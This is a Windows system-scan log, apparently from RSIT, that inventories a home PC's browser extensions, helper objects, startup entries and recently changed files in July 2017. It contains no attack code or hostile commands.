Adblock Plus - extension - {d10d0bf8-f5b5-c8b4-a8b2-2b9879e08c5d} - C:\Users\Eva Blažková\AppData\Roaming\Mozilla\Firefox\Profiles\n44035f3.default\extensions\{d10d0bf8-f5b5-c8b4-a8b2-2b9879e08c5d}.xpi
Multi-process staged rollout - extension - e10srollout@mozilla.org - C:\Program Files (x86)\Mozilla Firefox\browser\features\e10srollout@mozilla.org.xpi
Pocket - extension - firefox@getpocket.com - C:\Program Files (x86)\Mozilla Firefox\browser\features\firefox@getpocket.com.xpi
Web Compat - extension - webcompat@mozilla.org - C:\Program Files (x86)\Mozilla Firefox\browser\features\webcompat@mozilla.org.xpi
Application Update Service Helper - extension - aushelper@mozilla.org - C:\Program Files (x86)\Mozilla Firefox\browser\features\aushelper@mozilla.org.xpi
Firefox Screenshots - extension - screenshots@mozilla.org - C:\Program Files (x86)\Mozilla Firefox\browser\features\screenshots@mozilla.org.xpi
Default - theme - {972ce4c6-7e08-4474-a285-3208198ce6fd} - C:\Program Files (x86)\Mozilla Firefox\browser\extensions\{972ce4c6-7e08-4474-a285-3208198ce6fd}.xpi
Follow-on Search Telemetry - extension - followonsearch@mozilla.com - C:\Users\Eva Blažková\AppData\Roaming\Mozilla\Firefox\Profiles\n44035f3.default\features\{627a1210-f1fc-4161-b4a6-49ca822f1466}\followonsearch@mozilla.com.xpi
Shield Recipe Client - extension - shield-recipe-client@mozilla.org - C:\Users\Eva Blažková\AppData\Roaming\Mozilla\Firefox\Profiles\n44035f3.default\features\{627a1210-f1fc-4161-b4a6-49ca822f1466}\shield-recipe-client@mozilla.org.xpi
uBlock Origin - extension - uBlock0@raymondhill.net - C:\Users\Eva Blažková\AppData\Roaming\Mozilla\Firefox\Profiles\n44035f3.default\extensions\uBlock0@raymondhill.net.xpi

C:\Users\Eva Blažková\AppData\Roaming\Mozilla\Firefox\Profiles\n44035f3.default\pluginreg.dat
Plugin - Shockwave Flash - 26.0.0.137 - C:\WINDOWS\SysWOW64\Macromed\Flash\NPSWF32_26_0_0_137.dll

=========Google Chrome=========

C:\Users\Eva Blažková\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences
Extension aapocclcgogkmnckokdopfmhonfmgoek 1 Prezentace Google 0.9
Extension ahfgeienlihckogmohjhadlkjgocpleb 1 Obchod Chrome 0.2
Extension aohghmighlieiainnegkcijnfilokake 1 Dokumenty Google 0.9
Extension apdfllckaahabafndbhieahigkjlhalf 1 Disk Google 14.1
Extension bepbmhgboaologfdajaanbcjmnhjmhfn 0
Extension bgjpfhpjcgdppjbgnpnjllokbmcdllig 1 Seznam Lištička - Email 1.4.2
Extension blmojkbhnkkphngknkmgccmlenfaelkd 1 Seznam Lištička - Slovník 1.4.6
Extension blpcfgokakmgnkcojhhkbfbldkacnbeo 1 YouTube 4.2.8
Extension cjpalhdlnbpafiamejdnhcphjbkeiagm 1 uBlock Origin 1.13.2
Extension coobgpohoikkiipiblmjeljniedjpjpf 1 Vyhledávání Google 0.0.0.30
Extension eemcgdkfndhakfknompkggombfjjjeno 1 Bookmark Manager 0.1
Extension efaidnbmnnnibpcajpcglclefindmkaj 2 Adobe Acrobat 15.1.0.3
Extension ennkphjdgehloodpbhlhldgbnhmacadg 1 Settings 0.2
Extension eofcbnmajmjmplflapaojjnihcjkigck 0 Avast SafePrice 12.0.222
Extension gdkkmnngogaccacpomdhdiahljbjihoc 1 Farmville 2 Beacon 1.5
Extension gfdkimpbcpahaombhbimeihdjnejgicl 1 Feedback 1.0
Extension ghbmnnjooekpmoecnnnilnnbdlolhkhi 0 Dokumenty Google offline 1.4
Extension giehconkeccliemdfiadldepjbbdjllm 1 IATE 2.2
Extension gomekmidlodglbbmalcneegieacbdmki 2 Avast Online Security 10.2.0.190
Extension ilfoopambfaclfjmpiaijnccgcmbeigi 1 FormApps Extension 2.5.0.27
Extension kmendfapggjehodndflmmgagdbamhnfd 1 CryptoTokenExtension 0.9.46
Extension mfehgcgbbipciphmccgaenjidiccnmng 1 Cloud Print 0.1
Extension mgndgikekgjfcpckkfioiadnlibdjbkf 1 Chrome 0.1
Extension mhjfbmdgcfjbbpaeojofohoefgiehjai 1 Chrome PDF Viewer 1
Extension neajdppkdcdipfabeoofebfddakdcjhd 1 Google Network Speech 1.0
Extension nkeimhogjdpnpccoofpliimaahmaaome 1 Google Hangouts 1.3.3
Extension nmmhkkegccagdldgiimedpiccmgmieda 1 Platby Internetového obchodu Chrome 1.0.0.2
Extension olfeabkoenfaoljndfecamgilllcpiak 1 Seznam Lištička - Rychlá volba 1.9.1
Extension pafkbggdmjlpgkdkcbjmhmfcdpncadgh 1 Google Now 1.2.0.1
Extension pjkljhegncpnkpknbcohdijeoejaedia 1 Gmail 8.1
Extension pkedcjkdefgpdelpbcmbmeomcjbeemfm 1 Chrome Media Router 5917.424.0.6
Homepage: http://www.seznam.cz/
default_search_provider.search_url:
C:\Users\Eva Blažková\AppData\Local\Google\Chrome\User Data\Default\Preferences
Homepage:
default_search_provider.search_url:

[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Google\Chrome\Extensions\efaidnbmnnnibpcajpcglclefindmkaj]
"Path"=

[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Google\Chrome\Extensions\eofcbnmajmjmplflapaojjnihcjkigck]
"Path"=C:\Program Files\AVAST Software\Avast\WebRep\Chrome\aswWebRepChromeSp.crx

[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Google\Chrome\Extensions\gomekmidlodglbbmalcneegieacbdmki]
"Path"=C:\Program Files\AVAST Software\Avast\WebRep\Chrome\aswWebRepChrome.crx


======Registry dump ======


[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\SearchScopes]
"DefaultScope"={3C5B5400-6BFA-4617-B59B-A76A2EDA6B93}


[HKEY_LOCAL_MACHINE\SOFTWARE\wow6432node\Microsoft\Internet Explorer\SearchScopes]
"DefaultScope"={3C5B5400-6BFA-4617-B59B-A76A2EDA6B93}

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{3785D0AD-BFFF-47F6-BF5B-A587C162FED9}]
Canon Easy-WebPrint EX BHO - C:\Program Files\Canon\Easy-WebPrint EX\ewpexbho.dll [2016-02-23 217784]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{449D0D6E-2412-4E61-B68F-1CB625CD9E52}]
ExplorerBHO Class - C:\Program Files\Classic Shell\ClassicExplorer64.dll [2014-01-18 796352]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{72853161-30C5-4D22-B7F9-0BBC1D38A37E}]
Groove GFS Browser Helper - C:\PROGRA~1\MICROS~2\Office14\GROOVEEX.DLL [2013-12-19 6671064]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{8E5E2654-AD2D-48bf-AC2D-D17F00898D06}]
avast! Online Security - C:\Program Files\AVAST Software\Avast\aswWebRepIE64.dll [2017-04-26 895528]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{B4F3A835-0E21-4959-BA22-42B3008E02FF}]
Office Document Cache Handler - C:\PROGRA~1\MICROS~2\Office14\URLREDIR.DLL [2013-03-06 690392]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{EA801577-E6AD-4BD5-8F71-4BE0154331A4}]
ClassicIEBHO Class - C:\Program Files\Classic Shell\ClassicIEDLL_64.dll [2014-01-18 483520]

[HKEY_LOCAL_MACHINE\SOFTWARE\wow6432node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{3785D0AD-BFFF-47F6-BF5B-A587C162FED9}]
Canon Easy-WebPrint EX BHO - C:\Program Files (x86)\Canon\Easy-WebPrint EX\ewpexbho.dll [2016-02-23 184488]

[HKEY_LOCAL_MACHINE\SOFTWARE\wow6432node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{449D0D6E-2412-4E61-B68F-1CB625CD9E52}]
ExplorerBHO Class - C:\Program Files\Classic Shell\ClassicExplorer32.dll [2014-01-18 674496]

[HKEY_LOCAL_MACHINE\SOFTWARE\wow6432node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{72853161-30C5-4D22-B7F9-0BBC1D38A37E}]
Groove GFS Browser Helper - C:\PROGRA~2\MICROS~2\Office14\GROOVEEX.DLL [2013-12-19 4171480]

[HKEY_LOCAL_MACHINE\SOFTWARE\wow6432node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{8E5E2654-AD2D-48bf-AC2D-D17F00898D06}]
avast! Online Security - C:\Program Files\AVAST Software\Avast\aswWebRepIE.dll [2017-04-26 773920]

[HKEY_LOCAL_MACHINE\SOFTWARE\wow6432node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{B4F3A835-0E21-4959-BA22-42B3008E02FF}]
Office Document Cache Handler - C:\PROGRA~2\MICROS~2\Office14\URLREDIR.DLL [2013-03-06 562904]

[HKEY_LOCAL_MACHINE\SOFTWARE\wow6432node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{EA801577-E6AD-4BD5-8F71-4BE0154331A4}]
ClassicIEBHO Class - C:\Program Files\Classic Shell\ClassicIEDLL_32.dll [2014-01-18 437440]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Toolbar]
{553891B7-A0D5-4526-BE18-D3CE461D6310} - Classic Explorer Bar - C:\Program Files\Classic Shell\ClassicExplorer64.dll [2014-01-18 796352]
{759D9886-0C6F-4498-BAB6-4A5F47C6C72F} - Canon Easy-WebPrint EX - C:\Program Files\Canon\Easy-WebPrint EX\ewpexhlp.dll [2016-02-23 6149288]

[HKEY_LOCAL_MACHINE\SOFTWARE\wow6432node\Microsoft\Internet Explorer\Toolbar]
{553891B7-A0D5-4526-BE18-D3CE461D6310} - Classic Explorer Bar - C:\Program Files\Classic Shell\ClassicExplorer32.dll [2014-01-18 674496]
{759D9886-0C6F-4498-BAB6-4A5F47C6C72F} - Canon Easy-WebPrint EX - C:\Program Files (x86)\Canon\Easy-WebPrint EX\ewpexhlp.dll [2016-02-23 4452504]

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
"RTHDVCPL"=C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [2014-03-21 13672304]
"Classic Start Menu"=C:\Program Files\Classic Shell\ClassicStartMenu.exe [2014-01-18 161984]
"AutoRearm"=C:\WINDOWS\AutoRearm\AutoRearm.exe [2014-11-11 529408]
"BCSSync"=C:\Program Files\Microsoft Office\Office14\BCSSync.exe [2012-11-05 108144]
"AvastUI.exe"=C:\Program Files\AVAST Software\Avast\AvLaunch.exe [2017-04-26 213824]

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run]
"BtvStack"=C:\Program Files (x86)\Qualcomm Atheros\Bluetooth Suite\BtvStack.exe [2014-02-26 134784]

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"cz.seznam.software.autoupdate"=C:\Users\Eva Blažková\AppData\Roaming\Seznam.cz\szninstall.exe [2013-05-16 1062472]
"cz.seznam.software.szndesktop"=C:\Users\Eva Blažková\AppData\Roaming\Seznam.cz\bin\wszndesktop.exe [2015-05-26 103080]

[HKEY_LOCAL_MACHINE\Software\wow6432node\Microsoft\Windows\CurrentVersion\Run]
"seznam-listicka-distribuce"=C:\Program Files (x86)\Seznam.cz\distribution\szninstall.exe [2013-05-16 1062472]
"CanonQuickMenu"=C:\Program Files (x86)\Canon\Quick Menu\CNQMMAIN.EXE [2016-03-11 1314432]
"IJNetworkScannerSelectorEX"=C:\Program Files (x86)\Canon\IJ Network Scanner Selector EX\CNMNSST.exe [2014-01-15 438888]

[HKEY_LOCAL_MACHINE\Software\wow6432node\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run]
"BtvStack"=C:\Program Files (x86)\Qualcomm Atheros\Bluetooth Suite\BtvStack.exe [2014-02-26 134784]

C:\Users\Eva Blažková\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
Výřezy obrazovky a spuštění aplikace OneNote 2010.lnk - C:\Program Files\Microsoft Office\Office14\ONENOTEM.EXE

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks]
"{B5A7F190-DDA6-4420-B3BA-52453494E6CD}"=C:\PROGRA~1\MICROS~2\Office14\GROOVEEX.DLL [2013-12-19 6671064]

[HKEY_LOCAL_MACHINE\SOFTWARE\wow6432node\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks]
"{B5A7F190-DDA6-4420-B3BA-52453494E6CD}"=C:\PROGRA~2\MICROS~2\Office14\GROOVEEX.DLL [2013-12-19 4171480]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\iaioi2ce.sys]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MCODS]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\mcpltsvc]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\network\MCODS]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\network\mcpltsvc]

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"SoftwareSASGeneration"=1

[HKEY_LOCAL_MACHINE\system\currentcontrolset\services\sharedaccess\parameters\firewallpolicy\standardprofile\authorizedapplications\list]

[HKEY_LOCAL_MACHINE\system\currentcontrolset\services\sharedaccess\parameters\firewallpolicy\domainprofile\authorizedapplications\list]


[HKEY_LOCAL_MACHINE\Software\Microsoft\Active Setup\Installed Components\{8A69D345-D564-463c-AFF1-A69D9E530F96}]
"StubPath" = "C:\Program Files (x86)\Google\Chrome\Application\59.0.3071.115\Installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Drivers32]
"msacm.l3acm"=C:\Windows\System32\l3codeca.acm
"VIDC.YUY2"=msyuv.dll
"vidc.i420"=iyuv_32.dll
"msacm.msgsm610"=msgsm32.acm
"msacm.msg711"=msg711.acm
"VIDC.YVYU"=msyuv.dll
"VIDC.YVU9"=tsbyuv.dll
"wavemapper"=msacm32.drv
"midimapper"=midimap.dll
"VIDC.UYVY"=msyuv.dll
"VIDC.IYUV"=iyuv_32.dll
"vidc.mrle"=msrle32.dll
"msacm.imaadpcm"=imaadp32.acm
"msacm.msadpcm"=msadp32.acm
"vidc.msvc"=msvidc32.dll
"MSVideo8"=VfWWDM32.dll
"wave1"=wdmaud.drv
"midi1"=wdmaud.drv
"mixer1"=wdmaud.drv
"aux1"=wdmaud.drv
"wave"=wdmaud.drv
"midi"=wdmaud.drv
"mixer"=wdmaud.drv
"aux"=wdmaud.drv

====== File associations ======

.js - edit - C:\Windows\System32\Notepad.exe %1
.js - open - C:\Windows\System32\WScript.exe "%1" %*

====== List of files/folders created in the last 1 month ======

2017-07-18 08:30:20 ----D---- C:\_OTM
2017-07-17 11:32:35 ----A---- C:\WINDOWS\system32\aspnet_counters.dll
2017-07-17 11:32:29 ----A---- C:\WINDOWS\SYSWOW64\aspnet_counters.dll
2017-07-17 11:31:57 ----A---- C:\WINDOWS\SYSWOW64\msvcp120_clr0400.dll
2017-07-17 11:31:57 ----A---- C:\WINDOWS\system32\msvcr100_clr0400.dll
2017-07-17 11:31:57 ----A---- C:\WINDOWS\system32\msvcp120_clr0400.dll
2017-07-17 11:31:45 ----A---- C:\WINDOWS\SYSWOW64\msvcr100_clr0400.dll
2017-07-17 11:30:29 ----A---- C:\WINDOWS\SYSWOW64\msvcr120_clr0400.dll
2017-07-17 11:30:26 ----A---- C:\WINDOWS\system32\msvcr120_clr0400.dll
2017-07-17 10:51:49 ----D---- C:\rsit
2017-07-12 15:19:59 ----A---- C:\WINDOWS\system32\aepic.dll
2017-07-12 15:19:58 ----A---- C:\WINDOWS\system32\generaltel.dll
2017-07-12 15:19:58 ----A---- C:\WINDOWS\system32\devinv.dll
2017-07-12 15:19:58 ----A---- C:\WINDOWS\system32\centel.dll
2017-07-12 15:19:58 ----A---- C:\WINDOWS\system32\appraiser.dll
2017-07-12 15:19:58 ----A---- C:\WINDOWS\system32\aeinv.dll
2017-07-12 15:19:57 ----A---- C:\WINDOWS\system32\invagent.dll
2017-07-12 15:19:57 ----A---- C:\WINDOWS\system32\CompatTelRunner.exe
2017-07-12 15:19:57 ----A---- C:\WINDOWS\system32\acmigration.dll
2017-07-12 08:44:03 ----A---- C:\WINDOWS\system32\mshtml.dll
2017-07-12 08:44:00 ----A---- C:\WINDOWS\system32\jscript9.dll
2017-07-12 08:43:58 ----A---- C:\WINDOWS\SYSWOW64\mshtml.dll
2017-07-12 08:43:55 ----A---- C:\WINDOWS\SYSWOW64\jscript9.dll
2017-07-12 08:43:53 ----A---- C:\WINDOWS\system32\tquery.dll
2017-07-12 08:43:52 ----A---- C:\WINDOWS\SYSWOW64\tquery.dll
2017-07-12 08:43:52 ----A---- C:\WINDOWS\system32\win32k.sys
2017-07-12 08:43:51 ----A---- C:\WINDOWS\system32\ieframe.dll
2017-07-12 08:43:50 ----A---- C:\WINDOWS\SYSWOW64\mssrch.dll
2017-07-12 08:43:50 ----A---- C:\WINDOWS\system32\mssrch.dll
2017-07-12 08:43:49 ----A---- C:\WINDOWS\SYSWOW64\msxml3.dll
2017-07-12 08:43:49 ----A---- C:\WINDOWS\system32\msxml3.dll
2017-07-12 08:43:48 ----A---- C:\WINDOWS\system32\urlmon.dll
2017-07-12 08:43:48 ----A---- C:\WINDOWS\system32\ntoskrnl.exe
2017-07-12 08:43:48 ----A---- C:\WINDOWS\system32\kerberos.dll
2017-07-12 08:43:47 ----A---- C:\WINDOWS\SYSWOW64\kerberos.dll
2017-07-12 08:43:47 ----A---- C:\WINDOWS\system32\drivers\ntfs.sys
2017-07-12 08:43:46 ----A---- C:\WINDOWS\SYSWOW64\urlmon.dll
2017-07-12 08:43:46 ----A---- C:\WINDOWS\SYSWOW64\ieframe.dll
2017-07-12 08:43:45 ----A---- C:\WINDOWS\system32\winresume.exe
2017-07-12 08:43:45 ----A---- C:\WINDOWS\system32\winload.exe
2017-07-12 08:43:44 ----A---- C:\WINDOWS\system32\drivers\http.sys
2017-07-12 08:43:43 ----A---- C:\WINDOWS\system32\certutil.exe
2017-07-12 08:43:43 ----A---- C:\WINDOWS\system32\autoconv.exe
2017-07-12 08:43:42 ----A---- C:\WINDOWS\SYSWOW64\vbscript.dll
2017-07-12 08:43:42 ----A---- C:\WINDOWS\SYSWOW64\untfs.dll
2017-07-12 08:43:42 ----A---- C:\WINDOWS\SYSWOW64\autoconv.exe
2017-07-12 08:43:41 ----A---- C:\WINDOWS\SYSWOW64\certutil.exe
2017-07-12 08:43:41 ----A---- C:\WINDOWS\system32\vbscript.dll
2017-07-12 08:43:41 ----A---- C:\WINDOWS\system32\uReFS.dll
2017-07-12 08:43:41 ----A---- C:\WINDOWS\system32\untfs.dll
2017-07-12 08:43:40 ----A---- C:\WINDOWS\SYSWOW64\uReFS.dll
2017-07-12 08:43:40 ----A---- C:\WINDOWS\system32\termsrv.dll
2017-07-12 08:43:39 ----A---- C:\WINDOWS\SYSWOW64\WSDApi.dll
2017-07-12 08:43:39 ----A---- C:\WINDOWS\system32\srvsvc.dll
2017-07-12 08:43:39 ----A---- C:\WINDOWS\system32\drivers\clfs.sys
2017-07-12 08:43:38 ----A---- C:\WINDOWS\system32\WSDApi.dll
2017-07-12 08:43:38 ----A---- C:\WINDOWS\system32\ExplorerFrame.dll
2017-07-12 08:43:37 ----A---- C:\WINDOWS\system32\drivers\srv.sys
2017-07-12 08:43:36 ----A---- C:\WINDOWS\system32\wininet.dll
2017-07-12 08:43:36 ----A---- C:\WINDOWS\system32\smbwmiv2.dll
2017-07-12 08:43:36 ----A---- C:\WINDOWS\system32\drivers\srvnet.sys
2017-07-12 08:43:35 ----A---- C:\WINDOWS\SYSWOW64\Wldap32.dll
2017-07-12 08:43:35 ----A---- C:\WINDOWS\SYSWOW64\uudf.dll
2017-07-12 08:43:35 ----A---- C:\WINDOWS\SYSWOW64\ifsutil.dll
2017-07-12 08:43:35 ----A---- C:\WINDOWS\system32\ifsutil.dll
2017-07-12 08:43:35 ----A---- C:\WINDOWS\system32\drivers\storport.sys
2017-07-12 08:43:34 ----A---- C:\WINDOWS\SYSWOW64\ExplorerFrame.dll
2017-07-12 08:43:34 ----A---- C:\WINDOWS\system32\wvc.dll
2017-07-12 08:43:34 ----A---- C:\WINDOWS\system32\uudf.dll
2017-07-12 08:43:34 ----A---- C:\WINDOWS\system32\DAFWSD.dll
2017-07-12 08:43:33 ----A---- C:\WINDOWS\system32\Wldap32.dll
2017-07-12 08:43:33 ----A---- C:\WINDOWS\system32\msinfo32.exe
2017-07-12 08:43:32 ----AC---- C:\WINDOWS\system32\drivers\stornvme.sys
2017-07-12 08:43:32 ----A---- C:\WINDOWS\system32\wdc.dll
2017-07-12 08:43:32 ----A---- C:\WINDOWS\system32\drivers\srv2.sys
2017-07-12 08:43:32 ----A---- C:\WINDOWS\system32\drivers\netio.sys
2017-07-12 08:43:31 ----A---- C:\WINDOWS\SYSWOW64\wininet.dll
2017-07-12 08:43:31 ----A---- C:\WINDOWS\system32\drivers\pdc.sys
2017-07-12 08:43:30 ----A---- C:\WINDOWS\SYSWOW64\wsdchngr.dll
2017-07-12 08:43:30 ----A---- C:\WINDOWS\SYSWOW64\wdc.dll
2017-07-12 08:43:30 ----A---- C:\WINDOWS\SYSWOW64\ulib.dll
2017-07-12 08:43:30 ----A---- C:\WINDOWS\system32\wsdchngr.dll
2017-07-12 08:43:30 ----A---- C:\WINDOWS\system32\uexfat.dll
2017-07-12 08:43:30 ----A---- C:\WINDOWS\system32\jscript.dll
2017-07-12 08:43:30 ----A---- C:\WINDOWS\system32\cnvfat.dll
2017-07-12 08:43:29 ----A---- C:\WINDOWS\SYSWOW64\uexfat.dll
2017-07-12 08:43:29 ----A---- C:\WINDOWS\SYSWOW64\msinfo32.exe
2017-07-12 08:43:29 ----A---- C:\WINDOWS\system32\ulib.dll
2017-07-12 08:43:28 ----A---- C:\WINDOWS\SYSWOW64\ufat.dll
2017-07-12 08:43:28 ----A---- C:\WINDOWS\system32\ufat.dll
2017-07-12 08:43:28 ----A---- C:\WINDOWS\system32\sscore.dll
2017-07-12 08:43:28 ----A---- C:\WINDOWS\system32\rdsdwmdr.dll
2017-07-12 08:43:25 ----AC---- C:\WINDOWS\system32\drivers\bthpan.sys
2017-07-12 08:43:25 ----A---- C:\WINDOWS\SYSWOW64\wvc.dll
2017-07-12 08:43:25 ----A---- C:\WINDOWS\SYSWOW64\sscore.dll
2017-07-12 08:43:25 ----A---- C:\WINDOWS\SYSWOW64\cnvfat.dll
2017-07-12 08:43:25 ----A---- C:\WINDOWS\system32\snmptrap.exe
2017-07-12 08:43:23 ----A---- C:\WINDOWS\system32\msfeeds.dll
2017-07-12 08:43:23 ----A---- C:\WINDOWS\system32\inetcomm.dll
2017-07-12 08:43:22 ----A---- C:\WINDOWS\SYSWOW64\msfeeds.dll
2017-07-12 08:43:22 ----A---- C:\WINDOWS\SYSWOW64\inetcomm.dll
2017-07-12 08:43:22 ----A---- C:\WINDOWS\SYSWOW64\glcndFilter.dll
2017-07-12 08:43:22 ----A---- C:\WINDOWS\system32\convert.exe
2017-07-12 08:43:21 ----A---- C:\WINDOWS\system32\Windows.Data.Pdf.dll
2017-07-12 08:43:20 ----A---- C:\WINDOWS\SYSWOW64\Windows.Data.Pdf.dll
2017-07-12 08:43:20 ----A---- C:\WINDOWS\system32\glcndFilter.dll
2017-07-12 08:43:19 ----A---- C:\WINDOWS\SYSWOW64\jscript.dll
2017-07-12 08:43:19 ----A---- C:\WINDOWS\SYSWOW64\ieapfltr.dll
2017-07-12 08:43:19 ----A---- C:\WINDOWS\system32\ieapfltr.dll
2017-07-06 11:54:15 ----A---- C:\WINDOWS\SYSWOW64\ssinstall-uninstall.bat
2017-07-06 11:54:14 ----A---- C:\WINDOWS\SYSWOW64\ssleay32.dll
2017-07-06 11:54:14 ----A---- C:\WINDOWS\SYSWOW64\libeay32.dll
2017-07-06 11:54:13 ----A---- C:\WINDOWS\SYSWOW64\ssins.exe
2017-07-04 18:36:52 ----D---- C:\KVRT_Data
2017-07-04 18:36:22 ----D---- C:\ProgramData\AppData
2017-07-03 14:21:13 ----D---- C:\Program Files (x86)\OpenOffice 4

====== List of files/folders modified in the last 1 month ======

2017-07-18 08:37:51 ----D---- C:\Program Files\trend micro
2017-07-18 08:37:24 ----D---- C:\WINDOWS\Temp
2017-07-18 08:36:07 ----D---- C:\WINDOWS\Prefetch
2017-07-18 08:30:24 ----RD---- C:\Program Files
2017-07-18 08:29:16 ----HD---- C:\ProgramData
2017-07-18 08:08:15 ----D---- C:\Users\Eva Blažková\AppData\Roaming\ClassicShell
2017-07-18 08:07:35 ----D---- C:\WINDOWS\system32\drivers
2017-07-18 08:00:00 ----D---- C:\WINDOWS\system32\sru
2017-07-18 07:50:35 ----D---- C:\WINDOWS\system32\config
2017-07-17 21:37:07 ----D---- C:\WINDOWS\Microsoft.NET
2017-07-17 19:29:28 ----SHD---- C:\System Volume Information
2017-07-17 19:03:17 ----D---- C:\AdwCleaner
2017-07-17 18:59:34 ----D---- C:\Program Files (x86)\TeamViewer
2017-07-17 17:38:12 ----D---- C:\WINDOWS\WinSxS
2017-07-17 15:06:43 ----D---- C:\WINDOWS\SYSWOW64\en-US
2017-07-17 15:06:43 ----D---- C:\WINDOWS\SysWOW64
2017-07-17 15:06:42 ----RD---- C:\WINDOWS\System32
2017-07-17 15:06:42 ----D---- C:\WINDOWS\system32\en-US
2017-07-17 15:06:42 ----D---- C:\WINDOWS\Inf
2017-07-17 11:29:48 ----D---- C:\WINDOWS\CbsTemp
2017-07-17 07:00:03 ----D---- C:\WINDOWS\AppReadiness
2017-07-16 19:52:54 ----D---- C:\WINDOWS\rescache
2017-07-16 07:56:24 ----RSD---- C:\WINDOWS\assembly
2017-07-14 11:59:06 ----D---- C:\WINDOWS\system32\DriverStore
2017-07-13 12:58:38 ----D---- C:\WINDOWS\system32\appraiser
2017-07-13 12:35:04 ----D---- C:\WINDOWS\system32\MRT
2017-07-13 12:29:53 ----AC---- C:\WINDOWS\system32\MRT.exe
2017-07-13 12:01:36 ----D---- C:\ModelHE
2017-07-13 11:55:45 ----SHD---- C:\WINDOWS\Installer
2017-07-13 11:55:44 ----SHD---- C:\Config.Msi
2017-07-12 10:00:31 ----D---- C:\WINDOWS\system32\wbem
2017-07-12 10:00:31 ----D---- C:\WINDOWS\system32\drivers\en-US
2017-07-12 10:00:31 ----D---- C:\WINDOWS\system32\drivers\cs-CZ
2017-07-12 09:26:05 ----D---- C:\WINDOWS\SYSWOW64\Macromed
2017-07-12 09:09:33 ----D---- C:\ProgramData\Microsoft Help
2017-07-12 08:29:54 ----D---- C:\WINDOWS\system32\catroot2
2017-07-10 12:19:19 ----D---- C:\ProgramData\CanonIJPLM
2017-07-10 08:50:44 ----D---- C:\WINDOWS\system32\NDF
2017-07-09 17:30:01 ----A---- C:\WINDOWS\system32\PerfStringBackup.INI
2017-07-07 15:25:47 ----D---- C:\WINDOWS\system32\Tasks
2017-07-06 12:02:05 ----D---- C:\ProgramData\Adobe
2017-07-06 10:55:08 ----D---- C:\WINDOWS\debug
2017-07-05 13:42:41 ----D---- C:\Program Files (x86)\Google
2017-07-05 12:42:58 ----D---- C:\WINDOWS\system32\Macromed
2017-07-05 12:41:59 ----D---- C:\WINDOWS\SoftwareDistribution
2017-07-05 12:26:15 ----D---- C:\WINDOWS\Tasks
2017-07-05 12:23:28 ----D---- C:\Users\Eva Blažková\AppData\Roaming\Seznam.cz
2017-07-05 12:22:41 ----D---- C:\Program Files (x86)\Adobe
2017-07-05 12:17:34 ----D---- C:\Windows
2017-07-05 11:57:32 ----D---- C:\Program Files (x86)\Mozilla Firefox
2017-07-05 11:43:42 ----RD---- C:\Program Files (x86)
2017-07-04 22:59:19 ----HD---- C:\Program Files\WindowsApps
2017-07-04 22:56:23 ----D---- C:\Program Files (x86)\MyHeritage
2017-07-03 14:21:33 ----RSD---- C:\WINDOWS\Fonts
2017-06-30 02:27:57 ----A---- C:\WINDOWS\SYSWOW64\FlashPlayerApp.exe

File C:\WINDOWS\system32\winlogon.exe is digitally signed
File C:\WINDOWS\system32\wininit.exe is digitally signed
File C:\WINDOWS\explorer.exe is digitally signed
File C:\WINDOWS\SysWOW64\explorer.exe is digitally signed
File C:\WINDOWS\system32\svchost.exe is digitally signed
File C:\WINDOWS\SysWOW64\svchost.exe is digitally signed
File C:\WINDOWS\system32\services.exe is digitally signed
File C:\WINDOWS\system32\User32.dll is digitally signed
File C:\WINDOWS\SysWOW64\User32.dll is digitally signed
File C:\WINDOWS\system32\userinit.exe is digitally signed
File C:\WINDOWS\SysWOW64\userinit.exe is digitally signed
File C:\WINDOWS\system32\rpcss.dll is digitally signed
File C:\WINDOWS\system32\Drivers\volsnap.sys is digitally signed

====== List of drivers (R=Running, S=Stopped, 0=Boot, 1=System, 2=Auto, 3=Demand, 4=Disabled) ======

